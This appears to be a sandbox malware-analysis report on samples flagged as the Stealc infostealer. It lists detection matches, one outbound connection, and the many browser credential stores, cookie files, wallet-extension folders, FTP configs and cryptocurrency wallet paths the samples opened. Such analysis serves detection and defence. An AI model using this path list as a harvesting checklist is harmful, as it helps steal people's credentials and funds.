Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected Stealc

Source: Yara match	File source: 0000002B.00000003.3493806478.0000000005110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 35f0a75b93.exe PID: 7748, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: cd2469328d.exe, 0000000B.00000003.2792191733.0000000000D38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum
Source: cd2469328d.exe, 0000000B.00000003.2792191733.0000000000D38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: cd2469328d.exe	String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: cd2469328d.exe, 0000000B.00000003.2792191733.0000000000D38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: 5cda6c90d7.exe, 0000000C.00000003.2838471636.0000000001816000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d\}
Source: cd2469328d.exe	String found in binary or memory: ExodusWeb3
Source: cd2469328d.exe, 0000000B.00000003.2792191733.0000000000D38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Ethereum
Source: cd2469328d.exe	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: cd2469328d.exe, 0000000B.00000003.2691038020.0000000000D8D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Leaks process information

Source: global traffic

TCP traffic: 192.168.2.4:49930 -> 185.121.15.192:80

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
